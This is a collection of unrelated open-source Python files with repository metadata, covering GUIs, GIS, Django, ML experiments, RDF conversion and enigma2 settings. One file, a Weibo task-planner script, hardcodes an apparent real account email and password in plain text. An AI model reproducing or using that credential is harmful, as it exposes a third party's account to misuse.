# ch_box_fl = ttk.Checkbutton(options, text='Flickr', instate='selected');
ch_box_yt = ttk.Checkbutton(options, text='Youtube');
ch_box_fl = ttk.Checkbutton(options, text='Flickr');
ch_box_local = ttk.Checkbutton(options, text='Local Server (Not Available yet)', state='disabled');
selection_list = Listbox(options, listvariable = selectiones, height=10, selectmode='extended')
clear = ttk.Button(options, text= 'clear', command=clearSelection)
save_as = ttk.Button(options, text= 'save as', command =saveAs, state='active')
ch_box_yt.grid(sticky=W, columnspan=2)
ch_box_fl.grid(stick=W, columnspan=2)
ch_box_local.grid(sticky=W, columnspan=2)
selection_list.grid(sticky=(S, N, W, E), columnspan=2)
clear.grid(column=0, sticky=(W,E))
save_as.grid(column=1, row=4, sticky=(W,E))
options.grid_rowconfigure(3, weight=1)
options.grid_columnconfigure(1, weight=1)
# make add and remove buttons in a frame
addRemove = ttk.Frame(c, padding=0)
addSelect = ttk.Button(addRemove, text= '>>', command=addSelection)#, width=2)
removeSelect = ttk.Button(addRemove, text= '<<', command=removeSelection)#, width=2)
# moreResults = ttk.Button(addRemove, text= 'more\nresults', command=removeSelection, width=2)
prevSelect = ttk.Button(addRemove, text = 'view', command = preview);
addRemove.grid(column=3, row=2, rowspan = 3)
addSelect.grid()
removeSelect.grid()
prevSelect.grid()
# Grid all the widgets
query_entry.grid(column=0, row=0, sticky=(W,E))
yt_lbl.grid(column=0, row= 1, columnspan=2, sticky=(W,E))
fl_lbl.grid(column=0, row= 3, columnspan=2, sticky=(W,E))
yt_lbox.grid(column=0, row=2, columnspan=2, sticky=(N,S,W,E))
fl_lbox.grid(column=0, row=4, columnspan=2, sticky=(N,S,W,E))
options.grid(column=4, row=0, rowspan=5, sticky=(W,N,S,E))
search.grid(column=1, row=0, columnspan=2, sticky=(W,E))
status.grid(column=0, row=5, columnspan=3, sticky=(S,W,E))
max_results.grid(column=1, row=5, sticky=(S,W,E))
c.grid_columnconfigure(0, weight=5)
c.grid_columnconfigure(4, weight=4)
c.grid_rowconfigure(2, weight=1)
c.grid_rowconfigure(4, weight=1)
yt_s = ttk.Scrollbar(c, orient=VERTICAL, command=yt_lbox.yview)
yt_lbox.configure(yscrollcommand=yt_s.set)
yt_s.grid(column = 2, row = 2, sticky=(W,N,S))
fl_s = ttk.Scrollbar(c, orient=VERTICAL, command=fl_lbox.yview)
fl_lbox.configure(yscrollcommand=fl_s.set)
fl_s.grid(column = 2, row = 4, sticky=(W,N,S))
root.bind('<Return>', Search)
yt_lbox.bind('<space>', preview)
fl_lbox.bind('<space>', preview)
yt_lbox.bind('<space>', preview)
fl_lbox.bind('<space>', preview)
ttk.Sizegrip().grid(column=3, row=6, sticky=(S,E))
query.set('')
yt_results.set('')
fl_results.set('')
num_yt_results.set(10)
num_fl_results.set(10)
yt_lbox.selection_set(0)
fl_lbox.selection_set(0)
root.mainloop()
|
jpcurrea/FIU-Developmental-Psychobiology-Lab
|
search.py
|
Python
|
gpl-2.0
| 11,013
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
Union.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import QIcon
from qgis.core import QGis, QgsFeatureRequest, QgsFeature, QgsGeometry, QgsWKBTypes
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingLog import ProcessingLog
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
wkbTypeGroups = {
'Point': (QGis.WKBPoint, QGis.WKBMultiPoint, QGis.WKBPoint25D, QGis.WKBMultiPoint25D,),
'LineString': (QGis.WKBLineString, QGis.WKBMultiLineString, QGis.WKBLineString25D, QGis.WKBMultiLineString25D,),
'Polygon': (QGis.WKBPolygon, QGis.WKBMultiPolygon, QGis.WKBPolygon25D, QGis.WKBMultiPolygon25D,),
}
for key, value in wkbTypeGroups.items():
for const in value:
wkbTypeGroups[const] = key
GEOM_25D = [QGis.WKBPoint25D, QGis.WKBLineString25D, QGis.WKBPolygon25D,
QGis.WKBMultiPoint25D, QGis.WKBMultiLineString25D,
QGis.WKBMultiPolygon25D]
class Union(GeoAlgorithm):
INPUT = 'INPUT'
INPUT2 = 'INPUT2'
OUTPUT = 'OUTPUT'
def getIcon(self):
return QIcon(os.path.join(pluginPath, 'images', 'ftools', 'union.png'))
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Union')
self.group, self.i18n_group = self.trAlgorithm('Vector overlay tools')
self.addParameter(ParameterVector(Union.INPUT,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterVector(Union.INPUT2,
self.tr('Input layer 2'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addOutput(OutputVector(Union.OUTPUT, self.tr('Union')))
def processAlgorithm(self, progress):
vlayerA = dataobjects.getObjectFromUri(self.getParameterValue(Union.INPUT))
vlayerB = dataobjects.getObjectFromUri(self.getParameterValue(Union.INPUT2))
vproviderA = vlayerA.dataProvider()
geomType = vproviderA.geometryType()
if geomType in GEOM_25D:
raise GeoAlgorithmExecutionException(
self.tr('Input layer has unsupported geometry type {}').format(geomType))
fields = vector.combineVectorFields(vlayerA, vlayerB)
writer = self.getOutputFromName(Union.OUTPUT).getVectorWriter(fields,
geomType, vproviderA.crs())
inFeatA = QgsFeature()
inFeatB = QgsFeature()
outFeat = QgsFeature()
indexA = vector.spatialindex(vlayerB)
indexB = vector.spatialindex(vlayerA)
count = 0
nElement = 0
featuresA = vector.features(vlayerA)
nFeat = len(featuresA)
for inFeatA in featuresA:
progress.setPercentage(nElement / float(nFeat) * 50)
nElement += 1
lstIntersectingB = []
geom = QgsGeometry(inFeatA.geometry())
atMapA = inFeatA.attributes()
intersects = indexA.intersects(geom.boundingBox())
if len(intersects) < 1:
try:
outFeat.setGeometry(geom)
outFeat.setAttributes(atMapA)
writer.addFeature(outFeat)
except:
# This really shouldn't happen, as we haven't
# edited the input geom at all
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
else:
for id in intersects:
count += 1
request = QgsFeatureRequest().setFilterFid(id)
inFeatB = vlayerB.getFeatures(request).next()
atMapB = inFeatB.attributes()
tmpGeom = QgsGeometry(inFeatB.geometry())
if geom.intersects(tmpGeom):
int_geom = geom.intersection(tmpGeom)
lstIntersectingB.append(tmpGeom)
if int_geom is None:
# There was a problem creating the intersection
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('GEOS geoprocessing error: One or more input features have invalid geometry.'))
int_geom = QgsGeometry()
else:
int_geom = QgsGeometry(int_geom)
if int_geom.wkbType() == QGis.WKBUnknown or QgsWKBTypes.flatType(int_geom.geometry().wkbType()) == QgsWKBTypes.GeometryCollection:
# Intersection produced different geomety types
temp_list = int_geom.asGeometryCollection()
for i in temp_list:
if i.type() == geom.type():
int_geom = QgsGeometry(i)
try:
outFeat.setGeometry(int_geom)
outFeat.setAttributes(atMapA + atMapB)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
else:
# Geometry list: prevents writing error
# in geometries of different types
# produced by the intersection
# fix #3549
if int_geom.wkbType() in wkbTypeGroups[wkbTypeGroups[int_geom.wkbType()]]:
try:
outFeat.setGeometry(int_geom)
outFeat.setAttributes(atMapA + atMapB)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
# the remaining bit of inFeatA's geometry
# if there is nothing left, this will just silently fail and we're good
diff_geom = QgsGeometry(geom)
if len(lstIntersectingB) != 0:
intB = QgsGeometry.unaryUnion(lstIntersectingB)
diff_geom = diff_geom.difference(intB)
if diff_geom.isGeosEmpty() or not diff_geom.isGeosValid():
ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,
self.tr('GEOS geoprocessing error: One or more input features have invalid geometry.'))
if diff_geom.wkbType() == 0 or QgsWKBTypes.flatType(diff_geom.geometry().wkbType()) == QgsWKBTypes.GeometryCollection:
temp_list = diff_geom.asGeometryCollection()
for i in temp_list:
if i.type() == geom.type():
diff_geom = QgsGeometry(i)
try:
outFeat.setGeometry(diff_geom)
outFeat.setAttributes(atMapA)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
length = len(vproviderA.fields())
atMapA = [None] * length
featuresA = vector.features(vlayerB)
nFeat = len(featuresA)
for inFeatA in featuresA:
progress.setPercentage(nElement / float(nFeat) * 100)
add = False
geom = QgsGeometry(inFeatA.geometry())
diff_geom = QgsGeometry(geom)
atMap = [None] * length
atMap.extend(inFeatA.attributes())
intersects = indexB.intersects(geom.boundingBox())
if len(intersects) < 1:
try:
outFeat.setGeometry(geom)
outFeat.setAttributes(atMap)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
else:
for id in intersects:
request = QgsFeatureRequest().setFilterFid(id)
inFeatB = vlayerA.getFeatures(request).next()
atMapB = inFeatB.attributes()
tmpGeom = QgsGeometry(inFeatB.geometry())
if diff_geom.intersects(tmpGeom):
add = True
diff_geom = QgsGeometry(diff_geom.difference(tmpGeom))
if diff_geom.isGeosEmpty() or not diff_geom.isGeosValid():
ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,
self.tr('GEOS geoprocessing error: One or more input features have invalid geometry.'))
else:
try:
# Ihis only happends if the bounding box
# intersects, but the geometry doesn't
outFeat.setGeometry(diff_geom)
outFeat.setAttributes(atMap)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
if add:
try:
outFeat.setGeometry(diff_geom)
outFeat.setAttributes(atMap)
writer.addFeature(outFeat)
except:
ProcessingLog.addToLog(ProcessingLog.LOG_INFO,
self.tr('Feature geometry error: One or more output features ignored due to invalid geometry.'))
nElement += 1
del writer
|
SebDieBln/QGIS
|
python/plugins/processing/algs/qgis/Union.py
|
Python
|
gpl-2.0
| 11,981
|
#
# Baruwa - Web 2.0 MailScanner front-end.
# Copyright (C) 2010-2012 Andrew Colin Kissa <andrew@topdog.za.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# vim: ai ts=4 sts=4 et sw=4
#
from django import template
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
register = template.Library()
def lists_sorter(context, field_name, field_text):
"sort by field"
rlink = None
link = ''
direc = 'dsc'
if context['app'] == 'lists':
link = reverse('lists-full-sort', args=[context['list_kind'],
context['direction'], field_name])
if field_name == context['order_by']:
if context['direction'] == 'dsc':
direc = 'asc'
else:
direc = 'dsc'
rlink = reverse('lists-full-sort', args=[context['list_kind'],
direc, context['order_by']])
return {'field_text': _(field_text), 'link': link,
'rlink': rlink, 'dir': direc}
register.inclusion_tag('tags/sorter.html', takes_context=True)(lists_sorter)
|
liveaverage/baruwa
|
src/baruwa/lists/templatetags/lists_sorter.py
|
Python
|
gpl-2.0
| 1,742
|
from numpy import *
import alg6 as godfish
import alg5_workstypes as alg
import string
import os
import time
if __name__=='__main__':
import cPickle as pickle
fptr=open('yago_relationss_full.pkl', 'rb')
relationss= pickle.load(fptr)
fptr.close()
print 'yago loaded'
datasets=[]
for path,dirnames, filenames in os.walk('./techtc_processed_fixed/'):
filenames.sort()
for filename in filenames:
fptr=open(path+'/'+filename, 'rb')
datasets.append(pickle.load(fptr))
fptr.close()
count=0
res_7=[]
for ((trn, trn_lbl),(tst,tst_lbl)) in datasets:
print count
count+=1
if count>15:#each one goes different
continue
#make validation
true_trn=trn
tru_lbl=trn_lbl
trn=true_trn[7:-7]
trn_lbl=tru_lbl[7:-7]
vld=true_trn[:7]+true_trn[-7:]
vld_lbl=hstack((tru_lbl[:7],tru_lbl[-7:]))
errs_non_recurse=[]
errs_rel=[]
hug1=[]
hug2=[]
vars_non=[]
vars_=[]
vars_2=[]
vars_rel=[]
for i in [3,7]: #doesn't seem to matter much between 1/3/5 and 7/9(which are worse for tree)
alg.SPLIT_THRESH= i
alg.MAX_DEPTH= 0
blah11= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],0, True)
blah11.train(vld, vld_lbl)#non recursive
pred11=array([blah11.predict(x) for x in tst])
errs_non_recurse.append(mean(pred11!=tst_lbl))
vars_non.append(std(pred11!=tst_lbl))
alg.MAX_DEPTH= 0
blah12= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],0)
blah12.train(vld, vld_lbl)#non recursive
pred12=array([blah12.predict(x) for x in tst])
errs_rel.append(mean(pred12!=tst_lbl))
vars_rel.append(std(pred12!=tst_lbl))
alg.MAX_DEPTH= 1
before=time.time()
bc= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],5*(1**2))
bc.train(vld, vld_lbl)#non recursive
predx=array([bc.predict(x) for x in tst])
hug1.append(mean(predx!=tst_lbl))
vars_.append(std(predx!=tst_lbl))
print time.time()-before
alg.MAX_DEPTH= 2
before=time.time()
bc2= alg.TreeRecursiveSRLClassifier(trn, trn_lbl, relationss, [],5*(2**2))
bc2.train(vld, vld_lbl)#recursive, somewhere around best only...
print time.time()-before
predy=array([bc2.predict(x) for x in tst])
hug2.append(mean(predy!=tst_lbl))
vars_2.append(std(predy!=tst_lbl))
#Note: 100*(d**2) barely scales to 4, and would likely fail for 5
a=(blah11, blah12, bc, bc2
,errs_non_recurse, errs_rel, hug1, hug2
,vars_non, vars_rel, vars_, vars_2)
res_7.append(a)
godfish.clean_tree_for_pickle(blah11.query_tree)
godfish.clean_tree_for_pickle(blah12.query_tree)
godfish.clean_tree_for_pickle(bc.query_tree)
godfish.clean_tree_for_pickle(bc2.query_tree)
with open('results%d.pkl'%(count),'wb') as fptr:
pickle.dump(a, fptr, -1)
with open('final_res15.pkl','wb') as fptr:
pickle.dump(res_7, fptr, -1)
|
lioritan/Thesis
|
problems/techTCrun_old.py
|
Python
|
gpl-2.0
| 3,484
|
#-*- coding: utf8 -*-
import TaodianApi
import json
import time
import os
import string
print "start"
def file_exist():
filelist = os.listdir("../webrobot/")
exist = False
mx = "0001"
for f in filelist:
temp = f.split(".", 1)
if mx < temp[0]:
mx = temp[0]
#if temp[1] == "running" or temp[1] == "waiting" :
# exist = True
return {"status":exist, "filename":mx}
def write_plan(filename, tasklist):
filename = string.atoi(filename)+ 2
filename = "../webrobot/%04d.waiting" % filename
print filename
fl = open(filename,"w")
for ts in tasklist:
fl.write(ts+"\r\n")
fl.close()
print "waiting"
try:
api = TaodianApi.TaodianApi()
while True:
fe = file_exist()
if fe["status"] :
print "has waiting"
else:
param = {"time":"111111"}
plan = api.call("fans_scan_plan_list", param)
print plan
data = plan["data"]["data"]
#weibo_list = api.call("timing_weibo_account_list",{})
#weibo_list = weibo_list["data"]["data"]
weibo_data = "login_user=%s,login_passwd=%s" % ("helloaction@126.com","xingkong")
tasklist = []
t = time.localtime(time.time())
ref_time = time.localtime(time.time() - 60*60*24*2)
task_plan = time.strftime("%m%d", t)
task_id = string.atoi(time.strftime("%H%M%S", t))
for d in data:
#weibo_data = "login_user=%s,login_passwd=%s" % (weibo_list[i]["login_user"], weibo_list[i]["login_password"])
#task_id = task_id + 1
db_time =time.strptime(d["last_update_time"], "%Y-%m-%d %H:%M:%S")
if d["last_update_time"] == d["create_time"] or ref_time > db_time:
nick = "%s:%d-->%s@wb_account=%s,%s" % (task_plan, task_id, "send",d["nick"].encode("utf8"),weibo_data.encode("utf8"))
tasklist.append(nick)
write_plan(fe["filename"], tasklist)
time.sleep(60*60*5)
except:
pass
|
emop/webrobot
|
sina_empower/libs/myserver.py
|
Python
|
gpl-2.0
| 1,789
|
# Sketch - A Python-based interactive drawing program
# Copyright (C) 1998, 1999 by Bernhard Herzog
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
from Sketch.warn import warn_tb, USER
import Sketch
from wrapper import DocumentWrapper
class Context:
def __init__(self):
self.application = Sketch.main.application
self.main_window = self.application.main_window
self.document = self.main_window.document
class Script:
def __init__(self, name, title, function, args = (), kwargs = None,
sensitive = None):
self.name = name
self.title = title
self.function = function
self.args = args
self.kwargs = kwargs
self.sensitive = sensitive
def Title(self):
return self.title
def execute(self, context, *args, **kw):
document = context.main_window.document
apply(document.BeginTransaction, args, kw)
try:
try:
kw = self.kwargs
if kw is None:
kw = {}
apply(self.function, (context,) + self.args, kw)
except:
warn_tb(USER, 'Error in user script "%s"', self.name)
document.AbortTransaction()
finally:
document.EndTransaction()
class SafeScript(Script):
def Execute(self):
context = Context()
context.document = DocumentWrapper(context.document)
self.execute(context, self.Title())
#class SelectionScript(Script):
#
# def Execute(self):
# self.execute(Context(), clear_selection_rect = 0)
class AdvancedScript(Script):
def Execute(self):
self.execute(Context(), self.Title())
|
shumik/skencil-c
|
Sketch/Scripting/script.py
|
Python
|
gpl-2.0
| 2,386
|
__author__ = 'tmy'
from rdflib import Graph, Literal, Namespace, RDFS, URIRef
import urllib.parse as urllib
import logging
import pandas as pd
from ext2rdf.src.Utilities.Constants import LOG_LEVEL, NAMESPACE
from ext2rdf.src.RDFConverter.AbstractConverter import AbstractConverter
log = logging.getLogger()
log.setLevel(LOG_LEVEL)
class Converter(AbstractConverter):
def __init__(self):
self.namespace = Namespace(NAMESPACE)
def convert(self, data_frame):
log.info("converting data_frame...")
graph = Graph()
for _, row in data_frame.iterrows():
# Subject
subject_uri = urllib.quote(row['Subject'], '')
subject_node = URIRef(self.namespace[subject_uri])
graph.add((subject_node, RDFS.label, Literal(row['Subject'])))
# Predicate
predicate_uri = urllib.quote(row['Predicate'], '')
predicate_node = URIRef(self.namespace[predicate_uri])
graph.add((predicate_node, RDFS.label, Literal(row['Predicate'])))
# Object
object_uri = urllib.quote(row['Object'], '')
object_node = URIRef(self.namespace[object_uri])
graph.add((object_node, RDFS.label, Literal(row['Object'])))
graph.add((subject_node, predicate_node, object_node))
# Predicate Lemmatized
if not pd.isnull(row['PredicateLemma']):
predicate_lemma_uri = urllib.quote(row['PredicateLemma'], '')
predicate_lemma_node = URIRef(self.namespace[predicate_lemma_uri])
graph.add((subject_node, predicate_lemma_node, object_node))
return graph
|
Weissger/ext2rdf
|
src/RDFConverter/TripleStructureConverter.py
|
Python
|
gpl-2.0
| 1,676
|
import pisock
import datetime
def dlp_ReadDBList(sd, cardno=0, flags=None):
ret = []
i = 0
if flags is None:
flags = pisock.dlpDBListRAM
while True:
try:
lst = pisock.dlp_ReadDBList_(sd, cardno, pisock.dlpDBListMultiple | flags, i)
if (lst is None) or (len(lst) == 0):
return ret
for db in lst:
i = db['index'] + 1
ret.append(db)
except pisock.error:
if pisock.pi_palmos_error(sd)==pisock.dlpErrNotFound:
return ret
raise
def dlp_GetSysDateTime(sd):
r = pisock.dlp_GetSysDateTime_(sd)
return datetime.datetime.fromtimestamp(r)
|
unwiredben/pilot-link
|
bindings/Python/src/pisockextras.py
|
Python
|
gpl-2.0
| 701
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 Domsense s.r.l. (<http://www.domsense.com>).
# Copyright (C) 2012 Agile Business Group sagl (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import add_period
import remove_period
|
syci/domsense-agilebg-addons
|
account_vat_period_end_statement/wizard/__init__.py
|
Python
|
gpl-2.0
| 1,104
|
import Track, TManager, os, pygame
_sounds = {}
_images = {}
def _get_sound_and_image(soundpath, imagepath):
# sound
if _sounds.has_key(soundpath):
print "Reuse '" + soundpath + "'"
sound = _sounds.get(soundpath)
else:
if os.path.exists(soundpath):
print "Load '" + soundpath + "'"
_sounds[soundpath] = pygame.mixer.Sound(soundpath)
else:
print "Skip '" + soundpath + "'"
sound = _sounds.get(soundpath)
# image
if _images.has_key(imagepath):
print "Reuse '" + imagepath + "'"
image = _images.get(imagepath)
else:
if os.path.exists(imagepath):
print "Load '" + imagepath + "'"
_images[imagepath] = pygame.image.load(imagepath)
else:
print "Skip '" + imagepath + "'"
image = _images.get(imagepath)
return sound, image
def _load_playlist(manager, playlist_filename):
print "Loading playlist '" + playlist_filename + "'"
with open(playlist_filename, "r") as f:
content = f.readlines()
for l in content:
soundpath = l.rstrip()
if soundpath:
try:
imagepath = soundpath + ".bmp"
sound, image = _get_sound_and_image(soundpath, imagepath)
if sound != None:
track = Track.Track(sound, soundpath.split("/")[-1], image)
manager.add(track)
except RuntimeError:
print "Error when loading sound '" + l + "'"
f.close()
def load_playlists(playlist_filenames):
tmans = []
for playlist in playlist_filenames:
if not os.path.exists(playlist):
print('ERROR: Playlist "%s" was not found!' % sys.argv[1])
else:
tmanager = TManager.Manager()
_load_playlist(tmanager, playlist)
tmans.append(tmanager)
print str(len(tmans)) + " playlists loaded."
return tmans
|
danbraik/sample-studio
|
src/Loader.py
|
Python
|
gpl-2.0
| 2,048
|
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger(__name__)
class SingletonMixin(object):
def __new__(cls, *args, **kw):
if not hasattr(cls, '_instance'):
orig = super(SingletonMixin, cls)
cls._instance = orig.__new__(cls, *args, **kw)
return cls._instance
|
streethacker/soya
|
soya/utils/__init__.py
|
Python
|
gpl-2.0
| 321
|
#!/usr/bin/python
__author__ = 'Jannes Hoeke'
import led
import sys
from Colors import *
from led.PixelEventHandler import *
import random
""" https://github.com/HackerspaceBremen/pixels_basegame
depends on https://github.com/HackerspaceBremen/pygame-ledpixels
"""
class Basegame:
def __init__(self):
self.clock = pygame.time.Clock()
pygame.joystick.init()
# Initialize first joystick
if pygame.joystick.get_count() > 0:
stick = pygame.joystick.Joystick(0)
stick.init()
fallback_size = (90, 20)
self.ledDisplay = led.dsclient.DisplayServerClientDisplay('localhost', 8123, fallback_size)
pygame.font.init()
self.font_text = pygame.font.SysFont(None, 18)
# use same size for sim and real LED panel
size = self.ledDisplay.size()
self.simDisplay = led.sim.SimDisplay(size)
self.screen = pygame.Surface(size)
self.ticks = 0
self.fps = 10
self.gameover = False
self.sprites = []
# Draws the surface onto the display(s)
def update_screen(self, surface):
self.simDisplay.update(surface)
self.ledDisplay.update(surface)
# Gameloop update
def update(self):
screen = self.screen
# Count ticks independently of time so the timings won't mess up if the
# CPU is slow (you don't HAVE to use this,
# but I recommend it, since I had problems with this
self.ticks += 1
ticks = self.ticks
self.screen.fill(pygame.Color(0, 0, 0))
# generate new layer
if ticks % 3 is 0:
newsprites = []
for x in range(screen.get_width()):
new = pygame.Surface((1, 10))
h = random.randint(0, 30)
s = random.randint(80, 100)
v = random.randint(30, 50)
c = pygame.Color(0)
c.hsva = (h, s, v, 1)
new.fill(c)
newsprites.append([new, [x, 21], c]) # [sprite, [x, y], color]
pass # generate new fire
if len(self.sprites) > random.randint(8, 12):
self.sprites.pop(0)
self.sprites.append(newsprites)
for sprites in self.sprites:
for sprite in sprites:
# decrease size
new_size = sprite[0].get_height() - random.randint(0, 2)
if new_size < 0:
sprites.remove(sprite)
continue
# move sprite upwards
sprite[1][1] -= random.randint(0, 3)
sprite[0] = pygame.Surface((1, new_size))
sprite[0].fill(sprite[2])
screen.blit(sprite[0], sprite[1])
# Print fps
if ticks % self.fps == 0:
print self.clock.get_fps()
# Process event queue
def process_event_queue(self):
for pgevent in pygame.event.get():
if pgevent.type == QUIT:
pygame.quit()
sys.exit()
event = process_event(pgevent)
# End the game
if event.button == EXIT:
self.gameover = True
def main(self):
screen = self.screen
# Show loading message
font_text = self.font_text
write_lobby = font_text.render("Basegame", True, WHITE)
screen.fill(BLACK)
screen.blit(write_lobby, (2, 4))
self.update_screen(screen)
# Clear event list before starting the game
pygame.event.clear()
# Start of the gameloop
while not self.gameover:
# Check controls
self.process_event_queue()
# Call update method
self.update()
# Send screen to display
self.update_screen(screen)
# Tick the clock and pass the maximum fps
self.clock.tick(self.fps)
# End of the game
write_gameover = font_text.render("GAME OVER", True, WHITE)
screen.fill(BLACK)
screen.blit(write_gameover, (10, 4))
self.update_screen(screen)
# Wait for keypress
while True:
event = process_event(pygame.event.wait())
if event.type == PUSH:
break
# Show score
screen.fill(BLACK)
text_gameover = "Score: " + str(int(0))
write_gameover = font_text.render(text_gameover, True, WHITE)
screen.blit(write_gameover, (2, 4))
self.update_screen(screen)
# Wait for keypress
while True:
event = process_event(pygame.event.wait())
if event.type == PUSH:
break
pygame.quit()
game = Basegame()
game.main()
|
jh0ker/pixels_fire
|
game.py
|
Python
|
gpl-2.0
| 4,792
|
# -*- coding: utf-8 -*-
import os
from os import mkdir, rmdir, system, walk, stat as os_stat, listdir, readlink, makedirs, error as os_error, symlink, access, F_OK, R_OK, W_OK, rename as os_rename
from stat import S_IMODE
from re import compile
from enigma import eEnv
try:
from os import chmod
have_chmod = True
except:
have_chmod = False
try:
from os import utime
have_utime = True
except:
have_utime = False
SCOPE_TRANSPONDERDATA = 0
SCOPE_SYSETC = 1
SCOPE_FONTS = 2
SCOPE_SKIN = 3
SCOPE_SKIN_IMAGE = 4
SCOPE_USERETC = 5
SCOPE_CONFIG = 6
SCOPE_LANGUAGE = 7
SCOPE_HDD = 8
SCOPE_PLUGINS = 9
SCOPE_MEDIA = 10
SCOPE_PLAYLIST = 11
SCOPE_CURRENT_SKIN = 12
SCOPE_DEFAULTDIR = 13
SCOPE_DEFAULTPARTITION = 14
SCOPE_DEFAULTPARTITIONMOUNTDIR = 15
SCOPE_METADIR = 16
SCOPE_CURRENT_PLUGIN = 17
PATH_CREATE = 0
PATH_DONTCREATE = 1
PATH_FALLBACK = 2
# songingeun - [
HDD_PATH="/hdd/movie/"
from Tools.HardwareInfo import HardwareInfo
if HardwareInfo().get_device_name() in ('ios300hd', 'ios300newhd', 'tmnanooe', 'mediabox', 'optimussos1', 'optimussos1plus'):
HDD_PATH="/media/usb/movie/"
# ]
defaultPaths = {
SCOPE_TRANSPONDERDATA: (eEnv.resolve("${sysconfdir}/"), PATH_DONTCREATE),
SCOPE_SYSETC: (eEnv.resolve("${sysconfdir}/"), PATH_DONTCREATE),
SCOPE_FONTS: (eEnv.resolve("${datadir}/fonts/"), PATH_DONTCREATE),
SCOPE_CONFIG: (eEnv.resolve("${sysconfdir}/enigma2/"), PATH_CREATE),
SCOPE_PLUGINS: (eEnv.resolve("${libdir}/enigma2/python/Plugins/"), PATH_CREATE),
SCOPE_LANGUAGE: (eEnv.resolve("${datadir}/enigma2/po/"), PATH_DONTCREATE),
SCOPE_SKIN: (eEnv.resolve("${datadir}/enigma2/"), PATH_DONTCREATE),
SCOPE_SKIN_IMAGE: (eEnv.resolve("${datadir}/enigma2/"), PATH_DONTCREATE),
# SCOPE_HDD: ("/hdd/movie/", PATH_DONTCREATE),
SCOPE_HDD: (HDD_PATH, PATH_DONTCREATE),
SCOPE_MEDIA: ("/media/", PATH_DONTCREATE),
SCOPE_PLAYLIST: (eEnv.resolve("${sysconfdir}/enigma2/playlist/"), PATH_CREATE),
SCOPE_USERETC: ("", PATH_DONTCREATE), # user home directory
SCOPE_DEFAULTDIR: (eEnv.resolve("${datadir}/enigma2/defaults/"), PATH_CREATE),
SCOPE_DEFAULTPARTITION: ("/dev/mtdblock6", PATH_DONTCREATE),
SCOPE_DEFAULTPARTITIONMOUNTDIR: (eEnv.resolve("${datadir}/enigma2/dealer"), PATH_CREATE),
SCOPE_METADIR: (eEnv.resolve("${datadir}/meta"), PATH_CREATE),
}
FILE_COPY = 0 # copy files from fallback dir to the basedir
FILE_MOVE = 1 # move files
PATH_COPY = 2 # copy the complete fallback dir to the basedir
PATH_MOVE = 3 # move the fallback dir to the basedir (can be used for changes in paths)
fallbackPaths = {
